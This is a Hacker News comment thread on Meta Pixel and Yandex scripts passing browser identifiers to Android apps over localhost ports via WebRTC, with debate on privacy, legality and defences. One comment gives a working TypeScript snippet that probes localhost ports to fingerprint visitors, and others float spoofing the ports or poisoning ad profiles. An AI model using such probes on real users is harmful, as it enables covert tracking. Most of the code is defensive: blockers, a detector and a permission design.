I am not sure which Meta apps open ports, but e.g. Samsung phones come with a bunch of Meta apps pre-installed. IIRC just removing the Facebook app is not enough; there is another service installed that is not visible as an app (com.facebook.services etc.), which you can only uninstall from the data partition with something like ADB/UAD.
I remember analyzing a modern Samsung phone's web traffic a few years ago. It had by far the most ad-related and monetizing connections of any phone I've ever seen. And they were part of "necessary" functions, so you couldn't just block that traffic.
Samsung has great tech, but I avoid them because their software is so bloated and abusive.
I think Samsung stopped preinstalling Facebook's weird services a while back. Xiaomi still seems to be shipping Facebook last time I checked, though.
Even outside of Samsung a lot of "normal" apps come packed with Facebook crap because of Facebook's SDK (for the "log in with Facebook" button). There was that one incident where many/most iOS apps didn't open anymore because Meta fucked something up on their servers that crashed every app with the Facebook SDK inside of it (https://www.wired.com/story/facebook-sdk-ios-apps-spotify-ti...).
I tend to buy stock Android, e.g. Motorola moto g30, etc. It still has lots of Google stuff, but you can get rid of them, and I have a work profile specifically designed for Google-related stuff, and my personal profile is de-Googled as much as possible.
I would recommend everyone who wants a clean Android to look into Google Pixel phones. Aside from being mostly bloat-free (and most bloat can be uninstalled), it is one of the few phones that supports unlocking/relocking and a secure open source alternative (GrapheneOS).
Does grapheneos prevent this? In what way? I know apps like ShareViaHTTP [1] are able to open ports (listening not just on the loopback address). If I installed a meta app, could it still run its listener that scripts on webpages could talk to?
I didn't say that, only that GrapheneOS does not come with any adware/malware preinstalled. That said, their default browser did block one of the attack vectors.
Samsung devices are loaded with malware and AI slop in general. I'd avoid them if you care at all about privacy. Since Google is still missing end-to-end encryption for cloud data, iOS seems like the only good choice currently.
iOS sends data to metrics.apple.com, metrics.icloud.com, iadsdk.apple.com, etc. a lot. They are much better than Samsung (who send data to Samsung and other parties), but I am not convinced they are much better than Google devices. It's more about who you prefer sending your data to.
In the end something like GrapheneOS is the only good choice. Has all the security features of Pixel (which is similar to iPhone) and the tracking of neither.
Not all metrics are equal. I don't really care if Apple collects anonymized data on which features are most used, or collects crash reports. That's worlds away from using preinstalled apps to backdoor your phone so that tracking scripts get your details in Incognito mode.
> Not only are their websites painful, which discourages use, websites are more sandboxed.
This isn't remotely true. It is pretty trivial for a well-resourced engineering organization to generate unique fingerprints of users with common browser features.
Would an individual using this technique to collect information from someone else's computer possibly face prosecution under the Computer Fraud and Abuse Act?
People have been prosecuted under that act for clicking "view source" in their web browser. The crime itself is irrelevant. It's more about who you are, what connections you have, and who you piss off.
That was a real news story. A journalist looked at the state's educator-credentials checker, viewed the source, and saw it had teachers' SSNs in Base64 somewhere in the plaintext. Missouri Governor Mike Parson then tried to legally threaten the journalist. Honestly, if this case hadn't been so high-profile, I think he might have got a conviction, at least in state court.
This only works if you control the code on both sides (i.e. on the website being visited and in an app running on the phone). It's not some sort of magic hack that allows you to exfiltrate arbitrary browser history. Therefore it's unclear how it can be construed as "hacking" in any meaningful way. As bad as the non-consensual tracking done by Google/Meta/whoever is, it's not covered under the CFAA.
I agree it's not hacking, but the Computer Fraud and Abuse act seems to have a pretty broad definition of computer fraud and abuse. In particular, the technique seems like it might (emphasis mine) "knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct furthers the intended fraud and obtains anything of value …". Would the other person have a reasonable belief that they didn't authorize access to information which their OS attempts to prevent access to?
I don't know; you're purposefully abusing oversights to completely bypass the sandbox. It's an exploit for sure in my mind, and it seems very intentional. It was done this way specifically because it allows them to circumvent other protections they knew existed.
The Yandex one uses client/browser-side code to exfiltrate; it’s within the realm of possibility to abuse this, given a user visits a site under your control.
On the FB side, I can see a malicious user potentially poisoning a target site visitors’s ad profile or even social media algorithm with crafted cookies. Fill their feed with diaper ads or something.
*: Meta Pixel script was last seen sending via HTTP in Oct 2024, but Facebook and Instagram apps still listen on this port today. They also listen on port 12388 for HTTP, but we have not found any script sending to 12388.
**: Meta Pixel script sends to these ports, but Meta apps do not listen on them (yet?). We speculate that this behavior could be due to slow/gradual app rollout.
So, could some other app send data to these ports with a fake message? I'm asking for a friend that likes to do things for science.
Which, per the OP, the site would be doing by merely including the Meta pixel, which practically every e-commerce and news site does to track its campaigns and organic traffic.
The takeaway is that for all intents and purposes, anything you did in a private session or secondary profile on an Android device with any Meta app installed, was fully connected to your identity in that app for an unknown amount of time. And even with the tracking code deactivated, cookies may still persist on those secondary profiles that still allow for linking future activity.
Yes, but if the concern is not mixing business and personal compartment of the phone, business sites would hopefully not embed a Meta tracking pixel.
> The takeaway is that for all intents and purposes, anything you did in a private session or secondary profile on an Android device with any Meta app installed, was fully connected to your identity
Definitely, and that's a huge problem. I just don't think Android business profiles are a particular concern here; leaking app state to random websites in any profile is the problem.
Or do Android "business profiles" also include browser sessions? Then this would be indeed a cross-compartment leak. I'm not too familiar with Android's compartment model; iOS unfortunately doesn't offer sandboxing between environments that way.
While I agree with your reasoning, in my experience any statement where I prepend "hopefully" usually ends up being the worst possible interpretation in practice.
100% agree, and fingerprinting BYOD devices would be problematic in a lot of ways.
I'm generally against BYOD programs. They're convenient but usually come from a place of allowing employees access to things without the willingness to take on the cost (both in corp devices and inconvenience of a second phone/tablet/whatever) to run them with a high level of assurance.
Much better in my opinion to use something like PagerDuty or text/push notifications to prompt folks to check a corp device if they have alerts/new emails/whatever.
> do Android "business profiles" also include browser sessions
I believe that is typical.
My business profile has its own instance of Chrome, mostly used for internal and external sites that require corporate SSO or client certificates. Of course it could be used to browse anything.
webrtc was supposed to be for real-time comms, not fingerprinting people based on what random apps they have running on localhost. the fact that a browser sandbox still leaks this info is wild. like, you’re telling me port 43800 says more about me than a cookie ever could?
and of course, this all runs under the radar—no prompt, no opt-in, just “oh hey, we’re just scanning your machine real quick.” insane. might as well call it metascan™.
kinda makes me nostalgic for simpler times—when tracking meant throwing 200 trackers into a <script> tag and hoping one stuck. now it’s full-on black ops.
i swear, i’m two updates away from running every browser in a docker container inside a faraday cage.
Well, primarily it's the other apps that are saying a lot about you. I think this story emphasises yet again that websites are better for your privacy than apps. (Especially in a browser that has e.g. uBlock Origin, such as Firefox for Android.)
Does the Yandex HTTPS one mean they're shipping the private key for their cert in the app, therefore anything running on localhost (or on a network with poisoned DNS) can spoof the yandexmetrica site?
Yes, but presumably they aren't hosting anything on yandexmetrica.com, so any attacker might as well register yandexmetrica.net and get an SSL cert for that.
These sites both have the same potential for abuse.
All apps + the web browser being able to communicate freely over a shared localhost interface is such a glaring security hole that I'm surprised both iOS and Android allow it. What even is a legitimate use case for an app starting a local web server?
I expose a LAN accessible status board from an app via HTTP. The app runs completely offline, thus I can't rely on something hosted on the public internet.
My last electron app did effectively the same thing. I took the hosted version of my app and bundled in electron for offline usage with the bundled app being just a normal web application started by electron.
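For what it's worth, the legitimate pattern both comments describe is tiny; a sketch in TypeScript/Node (the port is arbitrary):

```typescript
// A LAN-visible status board served from a local HTTP server. Binding
// to 0.0.0.0 (all interfaces) makes it reachable from other devices on
// the LAN; binding to 127.0.0.1 instead would keep it device-local.
import { createServer } from "node:http";

createServer((_req, res) => {
  res.setHeader("Content-Type", "text/html");
  res.end("<h1>Status: OK</h1>");
}).listen(8080, "0.0.0.0");
```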
Doesn't iOS prompt you to give apps permission to connect to your local network? "App would like to find and connect to devices on your local network" or something along those lines. I always hit the "no thanks" button.
A long time ago I used it to work around an iOS limitation that prevented apps from simultaneously streaming audio and caching it. You could give the media player a URL for a remote stream, but you couldn’t read the same stream. The alternative was to get the stream yourself and implement your own media player. I didn’t want to write my own media player, so I requested the stream myself in order to cache it, and fed it back to the OS media player via localhost HTTP. Total hack, but it worked great. I wonder if they ever took that code out. It’s got hundreds of millions of installs at this point.
A comment I wrote in another HN thread [0] covering this issue:
Web apps talking to LAN resources is an attack vector which is surprisingly still left wide open by browsers these days. uBlock Origin has a filter list that prevents this called "Block Outsider Intrusion into LAN" under the "Privacy" filters [1], but it isn't enabled on a fresh install, it has to be opted into explicitly. It also has some built-in exemptions (visible in [1]) for domains like `figma.com` or `pcsupport.lenovo.com`.
There are some semi-legitimate uses, like Discord using it to check if the app is installed by scanning some high-numbered ports (6463-6472), but mainly it's used for fingerprinting by malicious actors, as shown in the article.
eBay, for example, uses port-scanning via a LexisNexis script for fingerprinting (they did in 2020 at least; unsure if they still do), allegedly for fraud-prevention reasons [2].
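A rough sketch of what such a localhost probe looks like from page TypeScript (ports from the Discord example above; the timeout heuristic is my assumption, not LexisNexis's exact method):

```typescript
// Probe a localhost port with a no-cors fetch: if something speaks HTTP
// there, the promise resolves (opaquely); a refused connection or
// timeout rejects. The pattern of open ports becomes a fingerprint.
async function probePort(port: number, timeoutMs = 500): Promise<boolean> {
  const ctrl = new AbortController();
  const timer = setTimeout(() => ctrl.abort(), timeoutMs);
  try {
    await fetch(`http://127.0.0.1:${port}/`, { mode: "no-cors", signal: ctrl.signal });
    return true;   // an HTTP listener answered
  } catch {
    return false;  // refused, timed out, or not HTTP
  } finally {
    clearTimeout(timer);
  }
}

// e.g. sweep the Discord RPC range mentioned above:
const open = await Promise.all([...Array(10)].map((_, i) => probePort(6463 + i)));
```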
I've contributed some to a cool Firefox extension called Port Authority [3][4] that's explicitly for blocking LAN intruding web requests that shows the portscan attempts it blocks. You can get practically the same results from just the uBlock Origin filter list, but I find it interesting to see blocked attempts at a more granular level too.
That said, both uBlock and Port Authority use WebExtensions' `webRequest` [5] API for filtering HTTP[S]/WS[S] requests. I'm unsure as to how the arcane webRTC tricks mentioned specifically relate to requests exposed to this API; it's possible they might circumvent the reach of available WebExtensions blocking methods, which wouldn't be good.
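For reference, a hedged sketch of what the `webRequest`-based blocking looks like (Firefox MV2-flavored TypeScript; `browser` is provided by the WebExtension runtime, and the address patterns are abbreviated; real lists also cover 172.16/12, IPv6, `.local`, etc.):

```typescript
// Cancel requests that pages on public origins make to loopback or
// private hosts ("outsider intrusion"). WebRTC traffic never reaches
// this API, which is exactly the potential gap discussed above.
const PRIVATE_HOST = /^(localhost|127\.|10\.|192\.168\.)/;

browser.webRequest.onBeforeRequest.addListener(
  (details) => {
    const target = new URL(details.url).hostname;
    const origin = details.originUrl ? new URL(details.originUrl).hostname : "";
    return { cancel: PRIVATE_HOST.test(target) && !PRIVATE_HOST.test(origin) };
  },
  { urls: ["<all_urls>"] },
  ["blocking"],
);
```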
Yep! Unfortunately its main method (as far as I remember from when I first read the proposal, at least; it may do more) is adding preflight requests and headers to opt in, which works for most cases yet doesn't block behind-the-lines collaborating apps like those mentioned in the main article. If there's a listening app (like Meta was caught running) that's expecting the requests, this doesn't do much to protect you.
EDIT: Looks like it does mention integrating into the permissions system [0], I guess I missed that. Glad they covered that consideration, then!
0. Define 2 blocklists: one for local domains and one for local IP addresses
1. Add a per-origin permission next to the already existing camera, mic, MIDI, etc. Let's call it LocalNetworkAccess, set to false by default.
2. Add 2 checks in the networking stack:
2a. Before DNS resolution, check the origin's LocalNetworkAccess permission. If false, check the URL domain against the domain blocklist and deny the request if it matches.
2b. Before the TCP or UDP connect, check the origin's LocalNetworkAccess permission. If false, check the remote IP address against the IP blocklist and deny the request if it matches.
3. If a request was denied, prompt the user to allow or disallow the LocalNetworkAccess permission for the origin, the same way the camera, mic or MIDI permission is already prompted for.
This is a trivial solution; there is no way this takes more than 200-300 lines of code to implement in any browser engine (see the sketch below). Why is it taking years?!
And then of course one can add browser-specific config options to customize the blocklists, but figure that out only after the immediate vulnerability has been fixed.
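In pseudo-TypeScript, the whole proposal is roughly this - every name here (LocalNetworkAccess, the blocklists, the prompt) is a hypothetical stand-in for browser internals:

```typescript
// Sketch of the proposed checks; nothing here is a real browser API.
type Permission = "granted" | "denied";

const blockedDomains = [/^localhost$/i, /\.local$/i, /\.internal$/i];
const blockedIps = [/^127\./, /^10\./, /^192\.168\./, /^169\.254\./, /^::1$/];

async function localNetworkAccessCheck(
  permission: Permission,                // step 1: per-origin, default denied
  hostname: string,
  resolveDns: (host: string) => Promise<string>,
  promptUser: () => Promise<Permission>, // step 3: camera/mic-style prompt
): Promise<boolean> {
  if (permission === "granted") return true;
  // 2a. Before DNS resolution: prompt on a blocklisted domain.
  if (blockedDomains.some((re) => re.test(hostname))) {
    return (await promptUser()) === "granted";
  }
  // 2b. Before the TCP/UDP connect: prompt on a blocklisted IP.
  const ip = await resolveDns(hostname);
  if (blockedIps.some((re) => re.test(ip))) {
    return (await promptUser()) === "granted";
  }
  return true; // not a local target, proceed as usual
}
```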
I agree, yet at least you can kind of see where they're coming from.
I guess a better example would be the automatic hardware detection Lenovo Support offers [0] by pinging a local app (with some clear confirmation dialogs first). Asus seems to do the same thing.
uBlock Origin has a fair few explicit exceptions [1] for cases like those (and other reasons) in its filter list to avoid breakage (notably Intel domains, the official Judiciary of Germany [2] (???), `figma.com`, `foldingathome.org`, etc).
That's the e-ID function of our personal ID cards (notably, NOT the passports). The user flow is:
1. A client (e.g. the Deutsche Rentenversicherung, Deutschland-ID, Bayern-ID, municipal authorities, and a few private-sector services as well) wishes to get cryptographically authenticated data about a person (name and address).
2. The web service redirects to Keycloak or another IDP solution.
3. The IDP solution calls the localhost port with some details on what exactly is requested, what public key of the service is used, and a matching certificate signed by the Ministry of the Interior (see the sketch below).
4. The locally installed application ("AusweisApp") now opens and displays these details to the user. When the user wishes to proceed, they click a "proceed" button and are then prompted to either insert the ID card into an NFC reader attached to the computer, or use a smartphone on the same network that also has the AusweisApp installed.
5. The ID card's chip verifies the certificate as well and asks for a PIN from the user.
6. The user enters the PIN.
7. The ID card chip now returns the data stored on it.
8. The AusweisApp submits an encrypted payload back to the calling IDP.
9. The IDP decrypts this data using its private key and redirects back to the actual application.
There is a bunch of cryptography additionally layered in the process that establishes a secure tunnel, but it's too complex to explain here.
In the end, it's a highly secure solution that makes sure the ID card only responds with sensitive information when the right configuration and conditions are met - unlike, say, the Croatian ID card, which will go as far as to deliver the picture on the card in digital form to anyone tapping your ID card on their phone. And that's also why it's impossible to implement in any other way - maaaaybe WebUSB, but you'd need to ship an entire PC/SC stack, and I'm not sure if WebUSB allows claiming a USB device that already has a driver attached.
In addition, the ID card and the passport also contain an ICAO-compliant method of obtaining the data in the MRZ, but I haven't read through the specs of that enough to actually implement it.
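The localhost call in step 3, as seen from the browser, is just a redirect to a well-known local port - a sketch following my reading of the eID-Client spec (BSI TR-03124), with the IDP URL as a hypothetical placeholder:

```typescript
// The IDP redirects the browser to the locally listening AusweisApp on
// port 24727, handing it a pointer to the request details rather than
// the data itself. URL is hypothetical.
const tcTokenURL = encodeURIComponent(
  "https://idp.example.org/eid/tcToken?session=abc123",
);
// The AusweisApp fetches the tcToken (what data is requested, which
// certificate) and takes over the flow from here.
window.location.href = `http://127.0.0.1:24727/eID-Client?tcTokenURL=${tcTokenURL}`;
```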
IMO browsers should not just block the request but block the whole website with one of those scary giant red banners if something like this is attempted. If all websites get for trying to work around privacy protections is that their attempts might not succeed, then there is little incentive not to try.
I built a little LAN tool https://router.fyi that tries to get LAN data for a sort of online nmap.
Depending on your browser, it's sometimes capable of finding Wi-Fi printers and a couple of other smart home devices I've manually added.
Of course the ID was easy to abuse, and I assume Google knew this, and also knew they'd need to have rules against abuse... and that they'd need to back up the rules with penalties, like Play Store permaban, legal action for damages, and maybe even referral for criminal investigation (CFAA violation?).
Unfortunately, even if they did have such rules, in this case, Meta is a too-big-to-deplatform tech company.
(Also, even if it wasn't Meta, sketchy behavior of tech might have the secret endorsement of IC and/or LE. So, making the sketchiness stop could be difficult, and also difficult to talk about.)
Google and Apple own their whole operating systems. They can do tracking directly in 50 different ways. Other corporations routinely renegotiate deals on sharing user surveillance data with them, for big, big money. So it has all already been paid for, and authorised. The only problem is that some stupid serfs are still making a fuss over it.
If I recall correctly Figma uses it to connect to the locally installed app, and Discord definitely uses it to check if its desktop app is installed by scanning ports (6463-6472).
I'm aware of two blockers for LAN intrusions from public internet domains: uBlock Origin has a filter list called "Block Outsider Intrusion into LAN" [0] under the "Privacy" filters, and there's a cool Firefox extension called Port Authority [1][2] that does pretty much the same thing, but more specifically targeted and without the exclusions allowed by the uBlock filter list (stuff like Figma's use is allowed through, as you can see in [0]). I've contributed some to Port Authority, too :)
There are surely other ways to achieve this. If you are logged into an app and the site at the same time, they can use the server to communicate. Discord doesn't need to know if the app is installed to work. That sounds sketchy.
It's just a way to ensure you open the desired context on a local Discord instance, not any instance that might be logged in to your account. I have a few personal computers logged in on Discord on the same account that could be active at the same time for example.
A commenter mentioned [1] that major Russian apps now all ask for permission to read a unique device ID to deanonymize users. The people who stopped Intel from adding such an ID to their CPUs had perfect foresight [2] (too bad Intel later added it anyway). But then it's not hard to guess that if you include a feature whose purpose is to attack the user, it will be used to attack the user.
Probably hard to do for many, but the solution seems to be not having their apps installed. It’s crazy to me that people tolerate FB et al. on their devices, where you have absolutely no control over what they’re doing.
I agree wrt Facebook, but there’s a long tail of useful apps-that-should-be-websites; 1 click for an app versus 45 seconds searching through tabs and re-logging in (etc) can be meaningful, especially when there are fifty of them.
My healthcare provider recently yanked the mobile version of their portal website, and forces users to download their app. Personally, I see the security angle, but still feel like it’s a punch in the face and so I just went back to paper billing and using a PC for healthcare stuff. More of this is coming, I suspect.
Possible, but potentially not as practical due to iOS’s restrictive background process model. There, background tasks are generally expected to quickly do whatever they need to and exit, and generally can’t run indefinitely. Periodic tasks are scheduled by the OS, with scheduling requests from apps being more likely to be honored if their processes are well-behaved (quick, low resource, don’t crash, and don’t run too frequently), and badly-behaved processes getting run less often.
Apps that keep themselves open by reporting that they’re playing audio might be able to work around this, but it’d still be spotty, since users frequently play media, which would suspend those backgrounded apps and eventually bump them out of memory.
A quite obvious attack mechanism; I'm surprised browsers permitted this in the first place. I can't think of a reason to STUN/TURN to localhost. Aside from localhost, trackers can also use all the other IP addresses available to the browser to bind their apps to and send traffic to.
Now that the mechanism is known (and widely implemented), one could write an app to notify users about attempted tracking. All you need to do is to open the listed UDP ports and send a notification when UDP traffic comes in.
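A sketch of such a detector, as a Node.js script rather than an Android app - the ports are the ones from the article, everything else is illustrative:

```typescript
// Bind the UDP ports the article lists and log anything that arrives.
// Note: binding fails if the Meta app already holds the port, which is
// itself a useful signal.
import dgram from "node:dgram";

for (let port = 12580; port <= 12585; port++) {
  const sock = dgram.createSocket("udp4");
  sock.on("message", (msg, rinfo) => {
    // On a phone this would raise a notification; here we just log it.
    console.log(`possible tracking probe on ${port} from ${rinfo.address}:`,
      msg.toString("utf8").slice(0, 80));
  });
  sock.on("error", (err) => {
    console.error(`cannot listen on ${port}: ${err.message}`);
    sock.close();
  });
  sock.bind(port, "127.0.0.1");
}
```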
For shits and giggles I was pondering whether it was possible to modify Android to hand out a different, temporary IPv6 address to every app and segment off any other interface that might be exposed, just because of shit like this (and use CLAT or some fallback mechanism for IPv4 connectivity). I thought this stuff was just a theoretical problem because it would be silly to be so blatant about tracking, but Facebook proves me wrong once again.
I hope EU regulators take note and start fining the websites that load these trackers without consent, but I suspect they won't have the capacity to do it.
> hand out a different, temporary IPv6 address to every app and segment off any other interface that might be exposed
Yes, but (AFAIK) not out of the box (unless one of the security focused ROMs already supports this). The kernel supports network namespaces and there's plenty of documentation available explaining how to make use of those. However I don't know if typical android ROMs ship with the necessary tooling.
Approximately, you'd just need to patch the logic where zygote changes the PID to also configure and switch to a network namespace.
I've looked into network namespaces a bit but from what I can tell you need to do a lot of manual routing and other weird stuff to actually make IPv6 addresses reachable through them.
In theory all you need to do is have zygote constrain the app further with a network namespace, and run a CLAT daemon for legacy networks, but in practice I'm not sure if that approach works well with 200 apps that each need their IPs rotated regularly.
Plus, you'd need to reconfigure the sandbox when switching between WiFi/5G/ethernet. Not impossible to overcome, but not the weekend project I'd hoped it would be.
I don't follow? Your system is either routing packets or not. IPv6 vs IPv4 should not be a notable difference here.
I've never tested network namespace scalability on a mobile device, but I doubt a few hundred of them would break anything (famous last words).
In the primary namespace you will need to configure some very basic routing. You will also need a solution for assigning IP addresses. That solution needs to be able to rotate IP assignments when the external IP block changes. That's pretty standard DHCP stuff. On a desktop distro doing the equivalent with systemd-networkd is possible out of the box with only a handful of lines in a config file.
Honestly a lot of Docker network setups are much more complicated than this. The difficult part here is not the networking but rather patching the zygote logic and authoring a custom build of android that incorporates the changes.
"UPDATE: As of June 3rd 7:45 CEST, Meta/Facebook Pixel script is no longer sending any packets or requests to localhost. The code responsible for sending the _fbp cookie has been almost completely removed."
I'm surprised they're allowed to listen on UDP ports, IIRC this requires special permissions?
> The Meta (Facebook) Pixel JavaScript, when loaded in an Android mobile web browser, transmits the first-party _fbp cookie using WebRTC to UDP ports 12580–12585 to any app on the device that is listening on those ports.
Borders on criminal behavior.
Apparently this was a European team of researchers, which would mean that Meta very likely breached the GDPR and ePrivacy Directive. Let's hope this gets very expensive for Meta.
As someone who works for a similarly large org, it's just as likely that some low-level programmer put it in without much thought, and then this got surfaced to higher-up people who didn't know about it and told them to remove it immediately.
It seems incredibly unlikely that a low-level programmer could come up with this method and then get the necessary code into both the tracking pixel served to third-party sites and Meta's Android apps without some higher-ups knowing about it.
Zuckerberg personally signed off on torrenting books for Llama. It would be a particularly dim group of “low level” programmers who did this without trying to first secure some upper level approvals to share the blame once caught.
Hopefully not too late to make it into the lawsuit. Assholes.
I sure hope there's a lawsuit. Over the last ten years, I've gotten over $2,000 in lawsuit settlement checks from Meta, alone.
I have a savings account at one of my banks that I use just for these settlement checks. Sometimes they're just $5. Sometimes they're a lot more. I think the most I ever got was around $500.
It's a little bit here, and a little bit there, but at the rate it's going, in another five years, I'll be able to buy a car with privacy violation money.
> The Meta (Facebook) Pixel JavaScript, when loaded in an Android mobile web browser, transmits the first-party _fbp cookie using WebRTC to UDP ports 12580–12585 to any app on the device that is listening on those ports.
And people on HN dismiss those who choose to browse with Javascript disabled.
There's a reason that the Javascript toggle is listed under the Security tab on Safari.
These companies have demonstrated repeatedly that fines are just the cost of doing business. Doesn't matter if you charge them $1 million or $1 billion. They have still made significantly more than that from the crime.
Yes, preventing the app from running in the background (entirely) would prevent it from listening on a port and collaborating with websites via this exploit.
As for the second part: no, logging out of the apps would not necessarily be enough. The apps can still link all the different web sessions together for surveillance purposes, whether or not they are also linked to an account within the app. Meta famously maintains "shadow profiles" of data not (yet) associated with a user of the service. Plus, the apps can trivially remember who was last logged in.
Unfortunately, on the modern web uMatrix is just incredibly annoying. Nearly every site breaks for various reasons, and often allowing everything in uMatrix still doesn't fix the issue.
Card payments, especially with 3D Secure flows that use iframes, are one of the biggest problems. This often leads to creating a new order several times, since allowing something + reloading loses the entire flow.
Captchas are also a massive pain, probably because they can't fingerprint as well as they normally do?
Life after disabling uMatrix completely has been better.
Those extensions are from the same author. I don't know the details but maybe gorhill didn't have the time to maintain uMatrix anymore and added the very minimum uMatrix functionality to uBO and settled for that. Luckily uMatrix keeps working.
Unauthorized access to a computer system. I'm sure if I connected to some port on a computer belonging to Meta without them wanting it, that would be the crime I would be charged with. But somehow if Meta connects to a port on my phone without me agreeing to it, it's not a crime?
What function does Instagram provide with this WebRTC listener besides tracking?
People install Instagram to look at photos and reels, not to help facebook track them better.
If I put a crypto-mining script in a game I don't get to claim "well they installed the app" when people complain. The victims thought they were installing a game, not a crypto-miner.
Here, the victims thought they were installing a photo sharing application, not a tracking relay.
It just makes me want to bin my phone, tbh. Thank God for RMS and Linus that you can at least run GNU and Linux on a laptop, as there is little left outside the panopticon.
And with all that tracking and spying on me, plus a boatload of voluntarily submitted data, Facebook still can't/won't show me any relevant advertising. I mean, even from the corpo point of view. Whenever I open my feed to read something, I see a boatload of complete garbage ads. Like, they are neither enticing to me nor promoting something corpos may want to shove in my face so I'd remember it, like some Coca-Cola or whatever product. But no, they have nothing.
I've just opened my feed in FB and let's see what ads will be today:
Group Dull Men's Club - some garbage meme dump, neither interesting nor selling any product or service.
Women emigrant group - I'm male and in a different location.
Rundown - some NN-generated slop about the NN industry
Car crash meme group from a different location.
Math picture meme group
LOTR meme group
Photo group with a theme I'm not interested in
Repeat of the above
Another meme group
Roland-Garros page - I've never watched tennis or written about it. My profile follows pages for a different sport altogether. None of those show up in the ads.
Another fact/meme group
Repeat
Repeat
Another fact/meme group
Expat group from incorrect location
And so on it goes. Like, who pays for all this junk? Who coordinates targeting? Why do they waste both their and my capacity on something that useless for both me and Facebook? I would understand if FB had ads for products/services, or something that loosely follows my likes. But what they have is a total, 100% miss. It's mind-boggling.
I guess the meme group ads are to draw you in, once you follow them they get to push you actual ads and it costs them less because Facebook doesn't charge them, thinking you want to see the group's posts. It must work to some extent.
I'm incredibly glad this isn't occurring in the UK + EU, because GDPR and the huge fines levied against Meta in the past have scared them sufficiently into not doing this kind of behaviour.
I wonder if companies like Wetter Online (from whom we know that they're selling the location data to brokers [0]) or ad service providers which offer libraries do the same.
If that were so, Google would have to be knowingly allowing this to happen and be a co-conspirator. I mean, they surveil our devices as if they were their home. Impossible that they're not aware.
All Meta software is spyware. Whether it's an app or a website, it exists only to pacify you into spending as much time on it as possible so they can hoover up your data. If those apps/websites provide you with anything useful, it is just a ruse to get more data from you.
To me it's weird that they're willing to misuse browser APIs so blatantly for interprocess communication, when, as I understand it, server-side correlation using a combination of IP, battery level and screen dimensions probably already gets them 95% of the surveillance capability.
Ah yes, and every small Android dev is banned from Play and Admob for tiny unknown reasons, with no recourse or way to communicate with Google. But Meta here probably won't get any problems at all. They should be temporarily banned!
Zero. People who work on ad-tech build ad-tech all day long, that's the entire job.
Seriously, why do you think all of the questionable things humanity has built have been built? It's because it's all just part of the job, for somebody.
People working at ad-tech question the things they're building just like the people at McDonalds flipping a burger are questioning the cholesterol levels of their customers. They're not.
Except Claude was trying to rat out users in their newer trials. In the end, the best whistleblower could end up being the AI… not sure what that says about us, though.
I mean, it is kind of a cool work around. There's a lot of motivation in telling someone they can't do something where "hide and watch" is a pretty typical response. The creative thinking that comes up with ideas like this is not something to discourage. It is a shame that the effort is for such a shit purpose, but these "people" are not stupid, and not many other areas offer these kind of challenges.
In the early days of the information revolution, when computers were new and being nerdy was still seen (almost universally) as a bad thing, a very high proportion of computer enthusiasts were people already on the fringes of society, for one reason or another. For a large number of them, hacking was a way to express their preexisting antiestablishment tendencies. For a lot of them, they were also your basic angsty adolescents and young adults rebelling against The Man as soon as they found any way to do so.
As time went on, computers became more mainstream, and lots more people started using them as part of daily life. This didn't mean that the number of antiestablishment computer users or hackers went down—just that they were no longer nearly so high a percentage of the total number of computer users.
So the answer to "what happened to all the hackers fighting for personal freedom and privacy?" is kinda threefold:
1) They never went away. They're still here, at places like the EFF, fighting for our personal freedom and privacy. They're just much less noticeable in a world where everyone uses computers...and where many more of the prominent institutions actually know how to secure their networks.
2) They grew up. Captain Crunch, the famous phreaker, is 82 this year. Steve Wozniak is 74. And while, sure, some people reach that age and still maintain not merely a philosophy, but a practice, of activism, it's much harder to keep up, and even many of those whose principles do not change will shift to methods that stay more within the system (e.g., supporting privacy legislation, or even running for office themselves).
3) They went to jail, were "scared straight", or died. The most prominent example of this group is, of course, Aaron Swartz, but many hacktivists will have had run-ins with the law, and of those many of them will have turned their back on the lifestyle to save themselves (even Captain Crunch was arrested and cooperated with the FBI).
Thanks for your thoughts! How can we create more hackers? I think the fear of punishment has really put a damper on things but not sure how that can be avoided.
Hacking isn't about crime. It's about exploration. There are lots of people showing "the youths" how interesting it is to break a lock or go around it. Basically, any time you can make a system do something fun, helpful, or interesting that it wasn't intended to do, that's hacking. You can be 100% law abiding with no fear of punishment and still get the full experience.
Well, note that my conclusion is largely that we have not, in fact, decreased the number of hackers, nor their proportion within the general population—just their proportion within the computer-using population, and that only by adding a large number of non-hackers to that population. I'm skeptical that we can ever increase the proportion of the population that has the hacker mindset much higher than it is without some kind of overall cultural shift (something that's beyond our power to affect).
But it's also unquestionably true that it's much easier to be a "hacker", in the sense we think of from the 1960s-80s, in a time and field where the hardware and software is simpler, more open, and less obfuscated. As such, I think it's probably not helpful to long for those bygone days—especially the "simpler" part—which we are clearly never getting back until and unless we make a breakthrough that is just as revolutionary as the transistor and the microchip were (and I'm skeptical as to whether that's possible, both in terms of what physics allow ever, and in terms of the shape of the corporate landscape now and for the foreseeable future). Honestly, a lot of the things that were possible back then, a lot of the incentive to get into hacking, was stuff that's actually hugely dangerous or invasive. Instead, I think it's better to focus on what we can do to improve the latter two parts of that equation: more open, less obfuscated.
Personally, I would say that the way toward that is pushing for, creating, and working on more open protocols and open standards, and insisting that those be used to enable more interoperability in place of proprietary formats and integration only with other software and hardware from the same company.
Eh. You can have a very comfortable career doing work that still lets you look at yourself in the mirror. You don’t have to choose to burn the world to pay the rent.
Not in this case. If you’re qualified to get a job at a company that will pay you to sell out your neighbor, you’re qualified to get a job with a decent boss who’ll never ask you to do this kind of thing, pays 90% as much, and is still many times the national average salary.
The alternatives are not doing evil vs starving. They’re getting paid well for doing evil, or getting paid well for doing good or at least neutral.
Also: Meta pauses mobile port tracking tech on Android after researchers cry foul - https://news.ycombinator.com/item?id=44175940 - June 2025 (26 comments)
This is the overall process used by Meta as I understand it, taken from https://localmess.github.io/:
1. User logged into FB or IG app. The app runs in background, and listens for incoming traffic on specific ports.
2. User visits website on the phone's browser, say something-embarassing.com, which happens to have a Meta Pixel embedded. From the article, Meta Pixel is embedded on over 5.8 million websites. Even in In-Cognito mode, they will still get tracked.
3. Website might ask for user's consent depending on location. The article doesn't elaborate, presumably this is the cookie banner that many people automatically accept to get on with their browsing?
4. > The Meta Pixel script sends the _fbp cookie (containing browsing info) to the native Instagram or Facebook app via WebRTC (STUN) SDP Munging.
You won't see this in your browser's dev tools.
5. Through the logged-in app, Meta can now associate the "anonymous" browser activity with the logged-in user. The app relays _fbp info and user id info to Meta's servers.
Also noteworthy:
> This web-to-app ID sharing method bypasses typical privacy protections such as clearing cookies, Incognito Mode and Android's permission controls. Worse, it opens the door for potentially malicious apps eavesdropping on users’ web activity.
